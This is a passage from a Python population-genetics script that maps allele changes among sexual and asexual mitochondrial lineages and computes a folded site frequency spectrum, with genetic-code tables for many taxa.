totalR5Sites += currR5
totalC6Sites += currC6
totalR6Sites += currR6
totalC7Sites += currC7
totalR7Sites += currR7
totalMeanCSites += currMeanC
totalMeanRSites += currMeanR
codonNum += 1
return [totalSynSites,totalNonsynSites,totalMeanCSites,totalMeanRSites,totalC1Sites,totalR1Sites,totalC2Sites,totalR2Sites,totalC3Sites,totalR3Sites,totalC4Sites,totalR4Sites,totalC5Sites,totalR5Sites,totalC6Sites,totalR6Sites,totalC7Sites,totalR7Sites]
def mapChanges(fasta):
#cladeDict = {'A': ['>$Heron2', '>$clone_1', '>$Rotoiti_1_4n', '>$AC51', '>$Heron_mitochondrion', '>$Grasmere_6_3n', '>$Poerua_triploid', '>$Brunner_6_3n', '>$McGregor', '>$Poerua_72_4n', '>$Gunn', '>$*Lady', '>$Grasmere_1_4n', '>$*Kaniere_1_2n', '>$*Rotoroa_1_2n', '>$*AlexMap', '>$*Alexsex', '>$*Yellow_Contig_56', '>$clone_7', '>$DenmarkA', '>$Duluth', '>$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237', '>$*Ianthe', '>$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309', '>$Waik37', '>$Waik372', '>$Tarawera', '>$Kaniere_triploid', '>$Waik36', '>$WalesC', '>$Brunner_2_4n'], 'B': ['>$Waik37', '>$Waik372', '>$Tarawera', '>$Kaniere_triploid', '>$Waik36', '>$WalesC', '>$Brunner_2_4n'], 'C': ['>$Waik37', '>$Waik372', '>$Tarawera', '>$Kaniere_triploid', '>$Waik36', '>$WalesC'], 'D': ['>$Waik37', '>$Waik372', '>$Tarawera', '>$Kaniere_triploid', '>$Waik36'], 'E': ['>$Waik37', '>$Waik372', '>$Tarawera', '>$Kaniere_triploid'], 'F': ['>$Waik37', '>$Waik372', '>$Tarawera'], 'G': ['>$Heron2', '>$clone_1', '>$Rotoiti_1_4n', '>$AC51', '>$Heron_mitochondrion', '>$Grasmere_6_3n', '>$Poerua_triploid', '>$Brunner_6_3n', '>$McGregor', '>$Poerua_72_4n', '>$Gunn', '>$*Lady', '>$Grasmere_1_4n', '>$*Kaniere_1_2n', '>$*Rotoroa_1_2n', '>$*AlexMap', '>$*Alexsex', '>$*Yellow_Contig_56', '>$clone_7', '>$DenmarkA', '>$Duluth', '>$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237', '>$*Ianthe', '>$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309'], 'H': ['>$*Ianthe', '>$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309'], 'I': ['>$Heron2', '>$clone_1', '>$Rotoiti_1_4n', '>$AC51', '>$Heron_mitochondrion', '>$Grasmere_6_3n', '>$Poerua_triploid', '>$Brunner_6_3n', '>$McGregor', '>$Poerua_72_4n', '>$Gunn', '>$*Lady', '>$Grasmere_1_4n', '>$*Kaniere_1_2n', '>$*Rotoroa_1_2n', '>$*AlexMap', '>$*Alexsex', '>$*Yellow_Contig_56', '>$clone_7', '>$DenmarkA', '>$Duluth', '>$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237'], 'J': ['>$clone_7', '>$DenmarkA', '>$Duluth', '>$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237'], 'K': ['>$clone_7', '>$DenmarkA', '>$Duluth'], 'L': ['>$clone_7', '>$DenmarkA'], 'M': ['>$Heron2', '>$clone_1', '>$Rotoiti_1_4n', '>$AC51', '>$Heron_mitochondrion', '>$Grasmere_6_3n', '>$Poerua_triploid', '>$Brunner_6_3n', '>$McGregor', '>$Poerua_72_4n', '>$Gunn', '>$*Lady', '>$Grasmere_1_4n', '>$*Kaniere_1_2n', '>$*Rotoroa_1_2n', '>$*AlexMap', '>$*Alexsex', '>$*Yellow_Contig_56'], 'N': ['>$*AlexMap', '>$*Alexsex', '>$*Yellow_Contig_56'], 'O': ['>$Heron2', '>$clone_1', '>$Rotoiti_1_4n', '>$AC51', '>$Heron_mitochondrion', '>$Grasmere_6_3n', '>$Poerua_triploid', '>$Brunner_6_3n', '>$McGregor', '>$Poerua_72_4n', '>$Gunn', '>$*Lady', '>$Grasmere_1_4n', '>$*Kaniere_1_2n', '>$*Rotoroa_1_2n'], 'P': ['>$Heron2', '>$clone_1', '>$Rotoiti_1_4n', '>$AC51', '>$Heron_mitochondrion', '>$Grasmere_6_3n', '>$Poerua_triploid', '>$Brunner_6_3n', '>$McGregor', '>$Poerua_72_4n', '>$Gunn', '>$*Lady', '>$Grasmere_1_4n', '>$*Kaniere_1_2n'], 'Q': ['>$*Lady', '>$Grasmere_1_4n', '>$*Kaniere_1_2n'], 'R': ['>$*Lady', '>$Grasmere_1_4n'], 'S': ['>$Heron2', '>$clone_1', '>$Rotoiti_1_4n', '>$AC51', '>$Heron_mitochondrion', '>$Grasmere_6_3n', '>$Poerua_triploid', '>$Brunner_6_3n', '>$McGregor', '>$Poerua_72_4n', '>$Gunn'], 'T': ['>$McGregor', '>$Poerua_72_4n', '>$Gunn'], 'U': ['>$McGregor', '>$Poerua_72_4n'], 'V': ['>$Heron2', '>$clone_1', '>$Rotoiti_1_4n', '>$AC51', '>$Heron_mitochondrion', '>$Grasmere_6_3n', '>$Poerua_triploid', '>$Brunner_6_3n'], 'W': ['>$AC51', '>$Heron_mitochondrion', '>$Grasmere_6_3n', '>$Poerua_triploid'], 'X': ['>$AC51', '>$Heron_mitochondrion', '>$Grasmere_6_3n'], 'Y': ['>$Heron2', '>$clone_1', '>$Rotoiti_1_4n'], 'Z': ['>$Heron2', '>$clone_1']}
positionDict = {(0,1533):'COI',(1533,2217):'COII',(2217,2373):'ATP8',(2373,3066):'ATP6',(3066,4005):'ND1',(4005,4509):'ND6',(4509,5646):'CYTB',(5646,5940):'ND4L',(5940,7314):'ND4',(7314,9030):'ND5',(9030,9807):'COIII',(9807,10158):'ND3',(10158,11214):'ND2'} #{(start,stop):gene}
seqDict, seqList, codonDict = buildCodonDict(fasta)
cladeList = ['H','L','R','U','Z','F','K','N','Q','T','Y','X','E','J','W','D','C','B','V','S','P','O','M','I','G','A']
popList = []
sexList = []
outList = []
asexList = []
for seq in seqList:
if '$' in seq:
popList.append(seq)
if '*' in seq:
sexList.append(seq)
else:
asexList.append(seq)
else:
outList.append(seq)
outSeq = seqDict[outList[0]]
sys.stdout.write('Asex Polymorphisms\nGene\tSite\tCodon\tLineages w/ Derived Allele\t# Individuals w/ derived allele\tAlleles\tP. est\n')
i = 0
while i < len(seqDict[seqList[0]]):
outNuc = outSeq[i]
gene = False
for locus in positionDict:
start = locus[0]
stop = locus[1]
if i >= start and i <= stop:
gene = positionDict[locus]
currAlleleDict = {}
currAlleleList = []
for seq in asexList:
currSeq = seqDict[seq]
currNuc = currSeq[i]
if currNuc not in currAlleleDict and 'N' != currNuc and '-' != currNuc:
currAlleleDict[currNuc] = [seq]
currAlleleList.append(currNuc)
elif 'N' != currNuc and '-' != currNuc:
currList = currAlleleDict[currNuc]
currList.append(seq)
currAlleleDict[currNuc] = currList
if len(currAlleleDict) > 1:
for nuc in currAlleleList:
if nuc != outNuc:
#currCladeList = cladeList
currList = currAlleleDict[nuc]
'''for group in cladeList:
compClade = cladeDict[group]
removeClade = False
for lineage in currList:
if lineage not in compClade:
removeClade = True
if removeClade == True:
currCladeList.remove(group)
print currCladeList
if len(currAlleleDict[nuc]) > 1:
sys.stdout.write(gene + '\t' + str(i + 1) + '\t' + str((i*3)+1) + '\t' + str(currAlleleDict[nuc]) + '\t' + str(len(currAlleleDict[nuc])) + '\t' + str(currAlleleList) + '\t' + outNuc + '\n')
else:'''
sys.stdout.write(gene + '\t' + str(i + 1) + '\t' + str((i*3)+1) + '\t' + str(currAlleleDict[nuc]) + '\t' + str(len(currAlleleDict[nuc])) + '\t' + str(currAlleleList) + '\t' + outNuc + '\n')
i += 1
def foldedSFS(fasta,code='invertebrateMt'):
geneticCodes = {'standard':{"TTT":"F", "TTC":"F", "TTA":"L", "TTG":"L", "TCT":"S", "TCC":"S", "TCA":"S", "TCG":"S", "TAT":"Y", "TAC":"Y", "TAA":"*", "TAG":"*", "TGT":"C", "TGC":"C", "TGA":"*", "TGG":"W", "CTT":"L", "CTC":"L", "CTA":"L", "CTG":"L", "CCT":"P", "CCC":"P", "CCA":"P", "CCG":"P", "CAT":"H", "CAC":"H", "CAA":"Q", "CAG":"Q", "CGT":"R", "CGC":"R", "CGA":"R", "CGG":"R", "ATT":"I", "ATC":"I", "ATA":"I", "ATG":"M", "ACT":"T", "ACC":"T", "ACA":"T", "ACG":"T", "AAT":"N", "AAC":"N", "AAA":"K", "AAG":"K", "AGT":"S", "AGC":"S", "AGA":"R", "AGG":"R", "GTT":"V", "GTC":"V", "GTA":"V", "GTG":"V", "GCT":"A", "GCC":"A", "GCA":"A", "GCG":"A", "GAT":"D", "GAC":"D", "GAA":"E", "GAG":"E", "GGT":"G", "GGC":"G", "GGA":"G", "GGG":"G"},'invertebrateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'vertebrateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': '*', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': '*', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'yeastMt':{'CTT': 'T', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'T', 'CTA': 'T', 'CTC': 'T', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'coelenterateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'ciliateNuc':{'CTT': 'L', 'TAG': 'Q', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': 'Q', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'echinodermMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'euplotidNuc':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'C', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'bacterial':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'yeastNuc':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'S', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'ascidianMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'G', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'G', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'flatwormMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': 'Y', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'chlorophyceanMt':{'CTT': 'L', 'TAG': 'L', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'trematodeMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'pterobranchiaMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'K', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}}
geneticCode = geneticCodes[code]
startCodons = ['ATT','ATC','ATA','ATG','GTG'] #invertebrateMt code
positionDict = {(0,1533):'COI',(1533,2217):'COII',(2217,2373):'ATP8',(2373,3066):'ATP6',(3066,4005):'ND1',(4005,4509):'ND6',(4509,5646):'CYTB',(5646,5940):'ND4L',(5940,7314):'ND4',(7314,9030):'ND5',(9030,9807):'COIII',(9807,10158):'ND3',(10158,11214):'ND2'} #{(start,stop):gene}
seqDict, seqList, codonDict = buildCodonDict(fasta)
popList = []
sexList = []
outList = []
asexList = []
logfile = open(fasta[0:-5] + '_foldedSFS.log','w')
for seq in seqList:
if '$' in seq:
popList.append(seq)
if '*' in seq:
sexList.append(seq)
else:
asexList.append(seq)
else:
outList.append(seq)
refSeq = seqDict[sexList[0]]
sys.stdout.write('Site\tCodon Position\tCodon Number\tAllele List\tAA List\tType of Change\t1\t2\t3\t4\t5\t6\t7\tC/R Index\t# Individuals w/ Minor Allele\n')
for site in range(len(refSeq)):
codonNum = site/3
pos = (site+1)%3
if pos == 1:
nucPos = 1
elif pos == 2:
nucPos = 2
elif pos == 0:
nucPos = 3
currAlleleDict = {}
currAlleleList = []
for seq in asexList:
currSeq = seqDict[seq]
currNuc = currSeq[site]
if currNuc not in currAlleleList and currNuc != 'N' and currNuc != '-':
currAlleleList.append(currNuc)
currAlleleDict[currNuc] = 1
elif currNuc != 'N' and currNuc != '-':
currValue = currAlleleDict[currNuc] + 1
currAlleleDict[currNuc] = currValue
if len(currAlleleDict) == 2:
currCodonDict = {}
currCodonList = []
for seq in asexList:
currCodons = codonDict[seq]
currCodon = currCodons[codonNum]
if 'N' not in currCodon and '-' not in currCodon and currCodon not in currCodonList:
currCodonList.append(currCodon)
currCodonDict[currCodon] = 1
elif 'N' not in currCodon and '-' not in currCodon:
currValue = currCodonDict[currCodon] + 1
currCodonDict[currCodon] = currValue
currAAList = []
for codon in currCodonList:
if codonNum == 0:
if codon in startCodons:
if 'M' not in currAAList:
currAAList.append('M')
else:
if geneticCode[codon] not in currAAList:
currAAList.append(geneticCode[codon])
elif geneticCode[codon] not in currAAList:
currAAList.append(geneticCode[codon])
if len(currAAList) == 1:
if currAlleleDict[currAlleleList[1]] < currAlleleDict[currAlleleList[0]]:
currMin = currAlleleList[1]
else:
currMin = currAlleleList[0]
sys.stdout.write(str(site + 1) + '\t' + str(nucPos) + '\t' + str(codonNum + 1) + '\t' + str(currAlleleList) + '\t' + currAAList[0] + '\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(currAlleleDict[currMin]) + '\n')
elif len(currCodonDict) == 2:
if currAlleleDict[currAlleleList[1]] < currAlleleDict[currAlleleList[0]]:
currMin = currAlleleList[1]
else:
